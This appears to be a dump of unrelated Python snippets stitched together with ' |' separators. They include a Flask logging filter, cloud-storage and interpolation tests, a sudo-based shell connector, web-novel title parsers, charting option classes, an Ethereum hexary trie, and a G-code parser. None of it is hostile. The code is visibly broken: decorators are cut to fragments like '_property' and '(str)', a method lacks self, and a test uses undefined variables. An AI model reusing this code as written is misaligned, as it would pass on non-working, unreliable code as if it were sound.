if (not isinstance(current_process, str)):
record.pid = current_process.pid
proc_name = current_process.name
if callable(proc_name):
proc_name = proc_name()
record.proc_name = proc_name
cmd_line = current_process.cmdline
if callable(cmd_line):
cmd_line = cmd_line()
record.command_line = ' '.join(cmd_line)
record.callstack = self.format_callstack()
record.url = '-'
record.args = '-'
record.form = '-'
record.username = '-'
try:
record.url = flask.request.url
except RuntimeError:
pass
try:
record.args = flask.request.args
except RuntimeError:
pass
try:
record.form = dict(flask.request.form)
if ('csrf_token' in record.form):
record.form['csrf_token'] = 'Was present, is cleaned up'
except RuntimeError:
pass
try:
record.username = f'{flask.g.user.id} -- {flask.g.user.email}'
except Exception:
pass
return True
def format_callstack():
ind = 0
for (ind, frame) in enumerate((f[0] for f in inspect.stack())):
if ('__name__' not in frame.f_globals):
continue
modname = frame.f_globals['__name__'].split('.')[0]
if (modname != 'logging'):
break
def _format_frame(frame):
return f''' File "{frame}", line %i in {frame}
{frame}'''
stack = traceback.extract_stack()
stack = stack[:(- ind)]
return '\n'.join([_format_frame(frame) for frame in stack])
def get_current_process():
mypid = os.getpid()
if (not psutil):
return f'Could not import psutil for {mypid!r}'
for proc in psutil.process_iter():
if (proc.pid == mypid):
return proc
raise ValueError(f'Could not find process {mypid!r}') |
def _verify_bucket(bucket, expected_name):
assert (bucket.name == expected_name)
file_name = 'data_{0}.txt'.format(int(time.time()))
blob = bucket.blob(file_name)
blob.upload_from_string('Hello World')
blob = bucket.get_blob(file_name)
assert (blob.download_as_string().decode() == 'Hello World')
bucket.delete_blob(file_name)
assert (not bucket.get_blob(file_name)) |
def test_medium_interp():
coord_interp = td.Coords(**{ax: np.linspace((- 2), 2, (20 + ind)) for (ind, ax) in enumerate('xyz')})
orig_data = make_scalar_data()
data_fit_nearest = coord_interp.spatial_interp(orig_data, 'nearest')
data_fit_linear = coord_interp.spatial_interp(orig_data, 'linear')
assert np.allclose(data_fit_nearest.shape[:3], [len(f) for f in coord_interp.to_list])
assert np.allclose(data_fit_linear.shape[:3], [len(f) for f in coord_interp.to_list])
assert (max(data_fit_linear.values.ravel()) <= max(orig_data.values.ravel()))
assert (min(data_fit_linear.values.ravel()) >= min(orig_data.values.ravel()))
assert (max(data_fit_nearest.values.ravel()) <= max(orig_data.values.ravel()))
assert (min(data_fit_nearest.values.ravel()) >= min(orig_data.values.ravel()))
Nx = 1
X = [1.1]
data = np.random.random((Nx, Ny, Nz, 1))
orig_data = td.ScalarFieldDataArray(data, coords=dict(x=X, y=Y, z=Z, f=freqs))
data_fit_nearest = coord_interp.spatial_interp(orig_data, 'nearest')
data_fit_linear = coord_interp.spatial_interp(orig_data, 'linear')
assert np.allclose(data_fit_nearest.shape[:3], [len(f) for f in coord_interp.to_list])
assert np.allclose(data_fit_linear.shape[:3], [len(f) for f in coord_interp.to_list])
assert (max(data_fit_linear.values.ravel()) <= max(orig_data.values.ravel()))
assert (min(data_fit_linear.values.ravel()) >= min(orig_data.values.ravel()))
assert (max(data_fit_nearest.values.ravel()) <= max(orig_data.values.ravel()))
assert (min(data_fit_nearest.values.ravel()) >= min(orig_data.values.ravel()))
assert (not np.allclose(orig_data.shape[:3], [len(f) for f in coord_interp.to_list])) |
class LocalShellConnector(Connector):
def execute(self, cmd, root=False):
if ((not root) and (os.geteuid() == 0)):
return execute_subprocess((['sudo', '-u', tools_user()[1]] + cmd))
if root:
cmd = (['sudo', '-n'] + cmd)
return execute_subprocess(cmd)
def push(self, src, dst):
(ret, stdout, stderr) = execute_subprocess(['cp', '-rf', src, dst])
if (ret != 0):
raise XVEx("Couldn't copy {} -> {}: stdout: {}, stderr: {}".format(src, dst, stdout, stderr))
if (os.geteuid() != 0):
return
L.verbose('Removing root permissions from file {} ({})'.format(dst, tools_user()[0]))
os.chown(dst, tools_user()[0], (- 1))
def pull(self, src, dst):
self.push(src, dst) |
def extractSporadicsporesBlogspotCom(item):
if ('Songs' in item['tags']):
return None
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('Chairman Husband Too Boorish', 'Chairman Husband Too Boorish', 'translated'), ('Heartbeat at the Tip of the Tongue', 'Heartbeat at the Tip of the Tongue', 'translated'), ('Love O2O', 'Love O2O', 'translated'), ('Heart Protection', 'Heart Protection', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
.parametrize('custom_fields_dict, expected_custom_fields', [({}, {'minSuccessRatio': 1.0}), ({'concurrency': 99}, {'parallelism': '99', 'minSuccessRatio': 1.0}), ({'min_success_ratio': 0.271828}, {'minSuccessRatio': 0.271828}), ({'concurrency': 42, 'min_success_ratio': 0.31415}, {'parallelism': '42', 'minSuccessRatio': 0.31415})])
def test_serialization_of_custom_fields(custom_fields_dict, expected_custom_fields, serialization_settings):
maptask = map_task(t1, **custom_fields_dict)
task_spec = get_serializable(OrderedDict(), serialization_settings, maptask)
assert (task_spec.template.custom == expected_custom_fields) |
class OptionPlotoptionsBarSonificationTracksMappingVolume(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class GaussianTanhTransformedHead():
mean: jnp.ndarray
log_std: jnp.ndarray
def sample(self, seed):
return reparameterize_gaussian_and_tanh(self.mean, self.log_std, seed, return_log_pi=False)
def sample_and_log_prob(self, key):
return reparameterize_gaussian_and_tanh(self.mean, self.log_std, key, return_log_pi=True)
def mode(self):
return jnp.tanh(self.mean) |
class Collection(Filter):
filters = List(Instance(PipelineBase), record=True)
_pipeline_ready = Bool(False)
def __set_pure_state__(self, state):
handle_children_state(self.filters, state.filters)
super(Collection, self).__set_pure_state__(state)
def default_traits_view(self):
le = ListEditor(use_notebook=True, deletable=False, export='DockWindowShell', page_name='.name')
view = View(Group(Item(name='filters', style='custom', show_label=False, editor=le, resizable=True), show_labels=False), resizable=True)
return view
def setup_pipeline(self):
if ((len(self.filters) > 0) and (not self._pipeline_ready)):
self._filters_changed([], self.filters)
def stop(self):
super(Collection, self).stop()
for filter in self.filters:
filter.stop()
def update_pipeline(self):
self._setup_pipeline()
self.pipeline_changed = True
def update_data(self):
self.data_changed = True
def _setup_pipeline(self):
if ((len(self.inputs) == 0) or (len(self.filters) == 0)):
return
my_input = self.inputs[0]
filters = self.filters
if (not self._pipeline_ready):
first = self.filters[0]
first.inputs = [my_input]
for i in range(1, len(filters)):
filter = filters[i]
filter.inputs = [filters[(i - 1)]]
self._pipeline_ready = True
for filter in filters:
filter.start()
last = filters[(- 1)]
self._set_outputs(last.outputs)
def _filters_changed(self, old, new):
self._handle_filters_changed(old, new)
def _filters_items_changed(self, list_event):
self._handle_filters_changed(list_event.removed, list_event.added)
def _scene_changed(self, old, new):
for filter in self.filters:
filter.scene = new
super(Collection, self)._scene_changed(old, new)
def _handle_filters_changed(self, removed, added):
for filter in removed:
self._setup_events(filter, remove=True)
filter.stop()
for filter in added:
if (self.scene is not None):
filter.scene = self.scene
if (len(filter.name) == 0):
filter.name = filter.__class__.__name__
if (filter is self.filters[(- 1)]):
self._setup_events(filter)
self._pipeline_ready = False
self._setup_pipeline()
def _fire_pipeline_changed(self):
self._set_outputs(self.filters[(- 1)].outputs)
def _setup_events(self, obj, remove=False):
obj.on_trait_change(self.update_data, 'data_changed', remove=remove)
obj.on_trait_change(self._fire_pipeline_changed, 'pipeline_changed', remove=remove)
def _visible_changed(self, value):
for filter in self.filters:
filter.visible = value
super(Collection, self)._visible_changed(value)
def _recorder_changed(self, old, new):
super(Collection, self)._recorder_changed(old, new)
for filter in self.filters:
filter.recorder = new |
def extractYuNSTranslations(item):
if ('(Manga)' in item['title']):
return None
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol or frag)) or ('preview' in item['title'].lower())):
return None
titlemap = [('Akashic Records of the Bastard Magical Instructor', 'Akashic Records of the Bastard Magical Instructor', 'translated'), ('Akashic Records of the Bastard Magic Instructor', 'Akashic Records of the Bastard Magical Instructor', 'translated'), ('Gifting this Wonderful World with Blessings!', 'Gifting this Wonderful World with Blessings!', 'translated'), ('Gifting this Wonderful Worlds with Explosions!', 'Gifting this Wonderful Worlds with Explosions!', 'translated'), ('I Shaved. Then I Brought a High School Girl Home', 'I Shaved. Then I Brought a High School Girl Home', 'translated')]
for (titlecomponent, name, tl_type) in titlemap:
if (titlecomponent.lower() in item['title'].lower()):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class OptionSeriesScatter3dAccessibilityPoint(Options):
def dateFormat(self):
return self._config_get(None)
def dateFormat(self, text: str):
self._config(text, js_type=False)
def dateFormatter(self):
return self._config_get(None)
def dateFormatter(self, value: Any):
self._config(value, js_type=False)
def describeNull(self):
return self._config_get(True)
def describeNull(self, flag: bool):
self._config(flag, js_type=False)
def descriptionFormat(self):
return self._config_get(None)
def descriptionFormat(self, text: str):
self._config(text, js_type=False)
def descriptionFormatter(self):
return self._config_get(None)
def descriptionFormatter(self, value: Any):
self._config(value, js_type=False)
def valueDecimals(self):
return self._config_get(None)
def valueDecimals(self, num: float):
self._config(num, js_type=False)
def valueDescriptionFormat(self):
return self._config_get('{xDescription}{separator}{value}.')
def valueDescriptionFormat(self, text: str):
self._config(text, js_type=False)
def valuePrefix(self):
return self._config_get(None)
def valuePrefix(self, text: str):
self._config(text, js_type=False)
def valueSuffix(self):
return self._config_get(None)
def valueSuffix(self, text: str):
self._config(text, js_type=False) |
def compare_and_connect_edge(node_id, nodes, motions, frames_compare, w_joints, w_joint_pos, w_joint_vel, w_root_pos, w_root_vel, w_ee_pos, w_ee_vel, w_trajectory, diff_threshold, num_comparison, verbose):
node = nodes[node_id]
res = []
num_nodes = len(nodes)
motion_idx = node['motion_idx']
frame_end = node['frame_end']
for j in range(num_nodes):
motion_idx_j = nodes[j]['motion_idx']
frame_start_j = nodes[j]['frame_start']
diff_pose = 0.0
diff_root_ee = 0.0
diff_trajectory = 0.0
for k in range(0, (frames_compare + 1), ((frames_compare + 1) // num_comparison)):
pose = motions[motion_idx].get_pose_by_frame((frame_end + k))
vel = motions[motion_idx].get_velocity_by_frame((frame_end + k))
pose_j = motions[motion_idx_j].get_pose_by_frame((frame_start_j + k))
vel_j = motions[motion_idx_j].get_velocity_by_frame((frame_start_j + k))
if (k == 0):
T_ref = pose.get_facing_transform()
T_ref_j = pose_j.get_facing_transform()
diff_pose += similarity.pose_similarity(pose, pose_j, vel, vel_j, w_joint_pos, w_joint_vel, w_joints)
diff_root_ee += similarity.root_ee_similarity(pose, pose_j, vel, vel_j, w_root_pos, w_root_vel, w_ee_pos, w_ee_vel, T_ref, T_ref_j)
if (w_trajectory > 0.0):
(R, p) = conversions.T2Rp(pose.get_facing_transform())
(R_j, p_j) = conversions.T2Rp(pose_j.get_facing_transform())
if (k > 0):
d = np.dot(R_prev.transpose(), (p - p_prev))
d_j = np.dot(R_j_prev.transpose(), (p_j - p_j_prev))
d = (d - d_j)
diff_trajectory += np.dot(d, d)
(R_prev, p_prev) = (R, p)
(R_j_prev, p_j_prev) = (R_j, p_j)
diff_pose /= num_comparison
diff_root_ee /= num_comparison
diff_trajectory /= num_comparison
diff = ((diff_pose + diff_root_ee) + diff_trajectory)
if (diff <= diff_threshold):
res.append((diff, node_id, j))
return res |
class HexaryTrie():
__slots__ = ('db', 'root_hash', 'is_pruning', '_ref_count', '_pending_prune_keys')
BLANK_NODE_HASH = BLANK_NODE_HASH
BLANK_NODE = BLANK_NODE
def __init__(self, db, root_hash=BLANK_NODE_HASH, prune=False, ref_count=None):
self.db = db
validate_is_bytes(root_hash)
self.root_hash = root_hash
self.is_pruning = prune
if (ref_count is None):
if prune:
self._ref_count = defaultdict(int)
else:
self._ref_count = None
elif prune:
self._ref_count = ref_count
else:
raise ValueError('Cannot pass an existing reference count in to a non-pruning trie')
self._pending_prune_keys = None
def get(self, key):
validate_is_bytes(key)
trie_key = bytes_to_nibbles(key)
root_hash = self.root_hash
try:
return self._get(root_hash, trie_key)
except MissingTraversalNode as traverse_exc:
raise MissingTrieNode(traverse_exc.missing_node_hash, root_hash, key, traverse_exc.nibbles_traversed) from traverse_exc
def _get(self, root_hash, trie_key):
(node, remaining_key) = self._traverse(root_hash, trie_key)
node_type = get_node_type(node)
if (node_type == NODE_TYPE_BLANK):
return BLANK_NODE
elif (node_type == NODE_TYPE_LEAF):
if (remaining_key == extract_key(node)):
return node[1]
else:
return BLANK_NODE
elif (node_type == NODE_TYPE_EXTENSION):
if (len(remaining_key) > 0):
raise ValidationError(f'Traverse should never return an extension node with remaining key, but returned node {node!r} with remaining key {remaining_key}.')
else:
return BLANK_NODE
elif (node_type == NODE_TYPE_BRANCH):
if (len(remaining_key) > 0):
raise ValidationError(f'Traverse should never return a non-empty branch node with remaining key, but returned node {node!r} with remaining key {remaining_key}.')
else:
return node[(- 1)]
else:
raise Exception("Invariant: This shouldn't ever happen")
def traverse(self, trie_key_input: NibblesInput) -> HexaryTrieNode:
trie_key = Nibbles(trie_key_input)
(node, remaining_key) = self._traverse(self.root_hash, trie_key)
annotated_node = annotate_node(node)
if remaining_key:
path_to_node = trie_key[:(len(trie_key) - len(remaining_key))]
raise TraversedPartialPath(path_to_node, annotated_node, remaining_key)
else:
return annotated_node
def _traverse(self, root_hash, trie_key) -> Tuple[(RawHexaryNode, Nibbles)]:
try:
root_node = self.get_node(root_hash)
except KeyError:
raise MissingTraversalNode(root_hash, ())
return self._traverse_from(root_node, trie_key)
def traverse_from(self, parent_node: HexaryTrieNode, trie_key_input: Nibbles) -> HexaryTrieNode:
trie_key = Nibbles(trie_key_input)
(node, remaining_key) = self._traverse_from(parent_node.raw, trie_key)
annotated_node = annotate_node(node)
if remaining_key:
path_to_node = trie_key[:(len(trie_key) - len(remaining_key))]
raise TraversedPartialPath(path_to_node, annotated_node, remaining_key)
else:
return annotated_node
def _traverse_from(self, node: RawHexaryNode, trie_key) -> Tuple[(RawHexaryNode, Nibbles)]:
remaining_key = trie_key
while remaining_key:
node_type = get_node_type(node)
if (node_type == NODE_TYPE_BLANK):
return (BLANK_NODE, ())
elif (node_type == NODE_TYPE_LEAF):
leaf_key = extract_key(node)
if key_starts_with(leaf_key, remaining_key):
return (node, remaining_key)
else:
return (BLANK_NODE, ())
elif (node_type == NODE_TYPE_EXTENSION):
try:
(next_node_pointer, remaining_key) = self._traverse_extension(node, remaining_key)
except _PartialTraversal:
return (node, remaining_key)
elif (node_type == NODE_TYPE_BRANCH):
next_node_pointer = node[remaining_key[0]]
remaining_key = remaining_key[1:]
else:
raise Exception("Invariant: This shouldn't ever happen")
try:
node = self.get_node(next_node_pointer)
except KeyError as exc:
used_key = trie_key[:(len(trie_key) - len(remaining_key))]
raise MissingTraversalNode(exc.args[0], used_key)
return (node, Nibbles(()))
def _traverse_extension(self, node, trie_key):
current_key = extract_key(node)
(common_prefix, current_key_remainder, trie_key_remainder) = consume_common_prefix(current_key, trie_key)
if (len(current_key_remainder) == 0):
return (node[1], trie_key_remainder)
elif (len(trie_key_remainder) == 0):
raise _PartialTraversal
else:
return (BLANK_NODE, ())
def _raise_missing_node(self, exception, key):
raise MissingTrieNode(exception.args[0], self.root_hash, key, prefix=None) from exception
_pending
def set(self, key, value):
validate_is_bytes(key)
validate_is_bytes(value)
trie_key = bytes_to_nibbles(key)
try:
root_node = self.get_node(self.root_hash)
if (value == b''):
new_node = self._delete(root_node, trie_key)
else:
new_node = self._set(root_node, trie_key, value)
except KeyError as exc:
self._raise_missing_node(exc, key)
self._set_root_node(new_node)
def _set(self, node, trie_key, value):
node_type = get_node_type(node)
self._prune_node(node)
if (node_type == NODE_TYPE_BLANK):
return [compute_leaf_key(trie_key), value]
elif (node_type in {NODE_TYPE_LEAF, NODE_TYPE_EXTENSION}):
return self._set_kv_node(node, trie_key, value)
elif (node_type == NODE_TYPE_BRANCH):
return self._set_branch_node(node, trie_key, value)
else:
raise Exception("Invariant: This shouldn't ever happen")
def exists(self, key):
validate_is_bytes(key)
return (self.get(key) != BLANK_NODE)
_pending
def delete(self, key):
validate_is_bytes(key)
trie_key = bytes_to_nibbles(key)
try:
root_node = self.get_node(self.root_hash)
new_node = self._delete(root_node, trie_key)
except KeyError as exc:
self._raise_missing_node(exc, key)
self._set_root_node(new_node)
def _delete(self, node, trie_key):
node_type = get_node_type(node)
self._prune_node(node)
if (node_type == NODE_TYPE_BLANK):
return BLANK_NODE
elif (node_type in {NODE_TYPE_LEAF, NODE_TYPE_EXTENSION}):
return self._delete_kv_node(node, trie_key)
elif (node_type == NODE_TYPE_BRANCH):
return self._delete_branch_node(node, trie_key)
else:
raise Exception("Invariant: This shouldn't ever happen")
def ref_count(self):
if (self._ref_count is None):
raise Exception('Trie does not track node usage unless pruning is enabled')
else:
return self._ref_count
def get_from_proof(cls, root_hash, key, proof):
trie = cls({})
for node in proof:
trie._set_raw_node(node)
with trie.at_root(root_hash) as proven_snapshot:
try:
return proven_snapshot.get(key)
except MissingTrieNode as e:
raise BadTrieProof(f'Missing proof node with hash {e.missing_node_hash}')
def get_proof(self, key):
validate_is_bytes(key)
node = self.get_node(self.root_hash)
trie_key = bytes_to_nibbles(key)
return self._get_proof(node, trie_key)
def _get_proof(self, node, trie_key, proven_len=0, last_proof=tuple()):
updated_proof = (last_proof + (node,))
unproven_key = trie_key[proven_len:]
node_type = get_node_type(node)
if (node_type == NODE_TYPE_BLANK):
return last_proof
elif (node_type == NODE_TYPE_LEAF):
return updated_proof
elif (node_type == NODE_TYPE_EXTENSION):
current_key = extract_key(node)
if key_starts_with(unproven_key, current_key):
next_node = self.get_node(node[1])
new_proven_len = (proven_len + len(current_key))
return self._get_proof(next_node, trie_key, new_proven_len, updated_proof)
else:
return updated_proof
elif (node_type == NODE_TYPE_BRANCH):
if (not unproven_key):
return updated_proof
next_node = self.get_node(node[unproven_key[0]])
new_proven_len = (proven_len + 1)
return self._get_proof(next_node, trie_key, new_proven_len, updated_proof)
else:
raise Exception("Invariant: This shouldn't ever happen")
def root_node(self) -> HexaryTrieNode:
try:
raw_node = self.get_node(self.root_hash)
except KeyError:
raise MissingTraversalNode(self.root_hash, nibbles_traversed=())
else:
return annotate_node(raw_node)
def _prune_on_success(self):
if self.is_pruning:
if (self._pending_prune_keys is None):
self._pending_prune_keys = defaultdict(int)
else:
raise ValidationError('Cannot set/delete simultaneously, run them in serial')
try:
(yield)
if self.is_pruning:
self._complete_pruning()
finally:
self._pending_prune_keys = None
def _prune_node(self, node):
if self.is_pruning:
(prune_key, node_body) = self._node_to_db_mapping(node)
if (node_body is not None):
self._pending_prune_keys[prune_key] += 1
def _complete_pruning(self):
for (key, number_prunes) in self._pending_prune_keys.items():
new_count = (self._ref_count[key] - number_prunes)
if (new_count <= 0):
try:
del self.db[key]
except KeyError as exc:
raise ValidationError(("Tried to prune key %r that doesn't exist" % key)) from exc
else:
new_count = 0
if (new_count == 0):
del self._ref_count[key]
else:
self._ref_count[key] = new_count
def regenerate_ref_count(self):
new_ref_count = defaultdict(int)
keys_to_count = [self.root_hash]
while keys_to_count:
key = keys_to_count.pop()
if ((key == b'') or isinstance(key, list) or (key == BLANK_NODE_HASH)):
continue
new_ref_count[key] += 1
node = self.get_node(key)
node_type = get_node_type(node)
if (node_type == NODE_TYPE_BLANK):
continue
if (node_type == NODE_TYPE_BRANCH):
keys_to_count.extend(node[:16])
elif (node_type == NODE_TYPE_EXTENSION):
keys_to_count.append(node[1])
return new_ref_count
def _set_raw_node(self, raw_node):
(key, value) = self._node_to_db_mapping(raw_node)
if (key == BLANK_NODE):
return BLANK_NODE_HASH
if (value is None):
encoded_node = encode_raw(key)
node_hash = keccak(encoded_node)
else:
encoded_node = value
node_hash = key
self._set_db_value(node_hash, encoded_node)
return node_hash
def _set_db_value(self, key, value):
self.db[key] = value
if self.is_pruning:
self._ref_count[key] += 1
def _set_root_node(self, root_node):
validate_is_node(root_node)
if self.is_pruning:
old_root_hash = self.root_hash
if (old_root_hash != BLANK_NODE_HASH):
try:
old_root_node = self.get_node(old_root_hash)
except KeyError:
pass
else:
(prune_key, node_body) = self._node_to_db_mapping(old_root_node)
if ((node_body is None) and (old_root_hash in self.db)):
self._pending_prune_keys[old_root_hash] += 1
self.root_hash = self._set_raw_node(root_node)
def get_node(self, node_hash):
if (node_hash == BLANK_NODE):
return BLANK_NODE
elif (node_hash == BLANK_NODE_HASH):
return BLANK_NODE
if (len(node_hash) < 32):
encoded_node = node_hash
else:
encoded_node = self.db[node_hash]
node = decode_node(encoded_node)
return node
def _node_to_db_mapping(self, node):
if (self.is_pruning and isinstance(node, list)):
return self._cached_create_node_to_db_mapping(tuplify(node))
else:
return self._create_node_to_db_mapping(node)
_cache(4096)
def _cached_create_node_to_db_mapping(self, node):
if isinstance(node, tuple):
node = listify(node)
return self._create_node_to_db_mapping(node)
def _create_node_to_db_mapping(self, node):
validate_is_node(node)
if is_blank_node(node):
return (BLANK_NODE, None)
encoded_node = encode_raw(node)
if (len(encoded_node) < 32):
return (node, None)
encoded_node_hash = keccak(encoded_node)
return (encoded_node_hash, encoded_node)
def _persist_node(self, node):
(key, value) = self._node_to_db_mapping(node)
if (value is not None):
self._set_db_value(key, value)
return key
def _normalize_branch_node(self, node):
iter_node = iter(node)
if (any(iter_node) and any(iter_node)):
return node
if node[(- 1)]:
return [compute_leaf_key([]), node[(- 1)]]
(sub_node_idx, sub_node_hash) = next(((idx, v) for (idx, v) in enumerate(node[:16]) if v))
sub_node = self.get_node(sub_node_hash)
sub_node_type = get_node_type(sub_node)
if (sub_node_type in {NODE_TYPE_LEAF, NODE_TYPE_EXTENSION}):
self._prune_node(sub_node)
new_subnode_key = encode_nibbles(tuple(itertools.chain([sub_node_idx], decode_nibbles(sub_node[0]))))
return [new_subnode_key, sub_node[1]]
elif (sub_node_type == NODE_TYPE_BRANCH):
return [encode_nibbles([sub_node_idx]), sub_node_hash]
else:
raise Exception('Invariant: this code block should be unreachable')
def _delete_branch_node(self, node, trie_key):
if (not trie_key):
node[(- 1)] = BLANK_NODE
return self._normalize_branch_node(node)
node_to_delete = self.get_node(node[trie_key[0]])
sub_node = self._delete(node_to_delete, trie_key[1:])
encoded_sub_node = self._persist_node(sub_node)
if (encoded_sub_node == node[trie_key[0]]):
return node
node[trie_key[0]] = encoded_sub_node
if (encoded_sub_node == BLANK_NODE):
return self._normalize_branch_node(node)
return node
def _delete_kv_node(self, node, trie_key):
current_key = extract_key(node)
if (not key_starts_with(trie_key, current_key)):
return node
node_type = get_node_type(node)
if (node_type == NODE_TYPE_LEAF):
if (trie_key == current_key):
return BLANK_NODE
else:
return node
sub_node_key = trie_key[len(current_key):]
sub_node = self.get_node(node[1])
new_sub_node = self._delete(sub_node, sub_node_key)
encoded_new_sub_node = self._persist_node(new_sub_node)
if (encoded_new_sub_node == node[1]):
return node
if (new_sub_node == BLANK_NODE):
return BLANK_NODE
new_sub_node_type = get_node_type(new_sub_node)
if (new_sub_node_type in {NODE_TYPE_LEAF, NODE_TYPE_EXTENSION}):
self._prune_node(new_sub_node)
new_key = (current_key + decode_nibbles(new_sub_node[0]))
return [encode_nibbles(new_key), new_sub_node[1]]
if (new_sub_node_type == NODE_TYPE_BRANCH):
return [encode_nibbles(current_key), encoded_new_sub_node]
raise Exception('Invariant, this code path should not be reachable')
def _set_branch_node(self, node, trie_key, value):
if trie_key:
sub_node = self.get_node(node[trie_key[0]])
new_node = self._set(sub_node, trie_key[1:], value)
node[trie_key[0]] = self._persist_node(new_node)
else:
node[(- 1)] = value
return node
def _set_kv_node(self, node, trie_key, value):
current_key = extract_key(node)
(common_prefix, current_key_remainder, trie_key_remainder) = consume_common_prefix(current_key, trie_key)
is_extension = is_extension_node(node)
if ((not current_key_remainder) and (not trie_key_remainder)):
if is_leaf_node(node):
return [node[0], value]
else:
sub_node = self.get_node(node[1])
new_node = self._set(sub_node, trie_key_remainder, value)
elif (not current_key_remainder):
if is_extension:
sub_node = self.get_node(node[1])
new_node = self._set(sub_node, trie_key_remainder, value)
else:
subnode_position = trie_key_remainder[0]
subnode_key = compute_leaf_key(trie_key_remainder[1:])
sub_node = [subnode_key, value]
new_node = (([BLANK_NODE] * 16) + [node[1]])
new_node[subnode_position] = self._persist_node(sub_node)
else:
new_node = ([BLANK_NODE] * 17)
if ((len(current_key_remainder) == 1) and is_extension):
new_node[current_key_remainder[0]] = node[1]
else:
if is_extension:
compute_key_fn = compute_extension_key
else:
compute_key_fn = compute_leaf_key
new_node[current_key_remainder[0]] = self._persist_node([compute_key_fn(current_key_remainder[1:]), node[1]])
if trie_key_remainder:
new_node[trie_key_remainder[0]] = self._persist_node([compute_leaf_key(trie_key_remainder[1:]), value])
else:
new_node[(- 1)] = value
if common_prefix:
new_node_key = self._persist_node(new_node)
return [compute_extension_key(common_prefix), new_node_key]
else:
return new_node
def __getitem__(self, key):
return self.get(key)
def __setitem__(self, key, value):
return self.set(key, value)
def __delitem__(self, key):
return self.delete(key)
def __contains__(self, key):
return self.exists(key)
def squash_changes(self):
scratch_db = ScratchDB(self.db)
with scratch_db.batch_commit(do_deletes=self.is_pruning):
Trie = type(self)
memory_trie = Trie(scratch_db, self.root_hash, prune=True, ref_count=self._ref_count)
(yield memory_trie)
if (self.root_hash != memory_trie.root_hash):
try:
raw_root_node = memory_trie.get_node(memory_trie.root_hash)
except KeyError:
self.root_hash = memory_trie.root_hash
else:
self.root_hash = self._set_raw_node(raw_root_node)
def at_root(self, at_root_hash):
if self.is_pruning:
raise ValidationError('Cannot use trie snapshot while pruning')
snapshot = type(self)(self.db, at_root_hash, prune=False)
(yield snapshot)
def __repr__(self) -> str:
return f'HexaryTrie({self.db!r}, root_hash={self.root_hash}, prune={self.is_pruning})' |
class gcodeParser(QObject):
sig_log = pyqtSignal(int, str)
def __init__(self):
super().__init__()
(str)
def noComment(self, gcodeLine: str):
line = ''
line_flags = 0
for c in gcodeLine:
if line_flags:
if (c == ')'):
if (line_flags & LINE_FLAG_COMMENT_PARENTHESES):
line_flags &= (~ LINE_FLAG_COMMENT_PARENTHESES)
elif (c <= ' '):
pass
elif (c == '/'):
pass
elif (c == '('):
line_flags |= LINE_FLAG_COMMENT_PARENTHESES
elif (c == ';'):
line_flags |= LINE_FLAG_COMMENT_SEMICOLON
else:
line += c.upper()
return line
(str)
def getMessage(self, gcodeLine: str):
try:
line = re.split('\\( *[Mm][Ss][Gg], *', gcodeLine, 1)[1].split(')')[0].strip()
except:
line = ''
return line
(str)
def wordDict(self, gcodeLine: str):
words = dict()
currentWord = ''
currentValue = ''
for c in self.noComment(gcodeLine):
if (c in VALIDES_GCODE_WORDS):
if (currentWord != ''):
words[currentWord] = currentValue
currentValue = ''
currentWord = c
else:
currentValue += c
words[currentWord] = currentValue
return words
(str)
def wordList(self, gcodeLine: str):
liste = []
currentWord = ''
currentValue = ''
for c in self.noComment(gcodeLine):
if (c in VALIDES_GCODE_WORDS):
if (currentWord != ''):
liste.append((currentWord + currentValue))
currentValue = ''
currentWord = c
else:
currentValue += c
liste.append((currentWord + currentValue))
return liste |
_util.copy_func_kwargs(AppDistributionOptions)
def on_new_tester_ios_device_published(**kwargs) -> _typing.Callable[([OnNewTesterIosDevicePublishedCallable], OnNewTesterIosDevicePublishedCallable)]:
options = AppDistributionOptions(**kwargs)
def on_new_tester_ios_device_published_inner_decorator(func: OnNewTesterIosDevicePublishedCallable):
_functools.wraps(func)
def on_new_tester_ios_device_published_wrapped(raw: _ce.CloudEvent):
from firebase_functions.private._alerts_fn import app_distribution_event_from_ce
func(app_distribution_event_from_ce(raw))
_util.set_func_endpoint_attr(on_new_tester_ios_device_published_wrapped, options._endpoint(func_name=func.__name__, alert_type='appDistribution.newTesterIosDevice'))
return on_new_tester_ios_device_published_wrapped
return on_new_tester_ios_device_published_inner_decorator |
class OptionPlotoptionsPackedbubbleSonificationContexttracksMappingNoteduration(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class FileInfo(HasPrivateTraits):
file_name = File()
name = Property()
size = Property()
time = Property()
date = Property()
_property
def _get_name(self):
return basename(self.file_name)
_property
def _get_size(self):
return getsize(self.file_name)
_property
def _get_time(self):
return strftime('%I:%M:%S %p', localtime(getmtime(self.file_name)))
_property
def _get_date(self):
return strftime('%m/%d/%Y', localtime(getmtime(self.file_name))) |
class OptionSeriesTilemapDataEvents(Options):
def click(self):
return self._config_get(None)
def click(self, value: Any):
self._config(value, js_type=False)
def drag(self):
return self._config_get(None)
def drag(self, value: Any):
self._config(value, js_type=False)
def dragStart(self):
return self._config_get(None)
def dragStart(self, value: Any):
self._config(value, js_type=False)
def drop(self):
return self._config_get(None)
def drop(self, value: Any):
self._config(value, js_type=False)
def mouseOut(self):
return self._config_get(None)
def mouseOut(self, value: Any):
self._config(value, js_type=False)
def mouseOver(self):
return self._config_get(None)
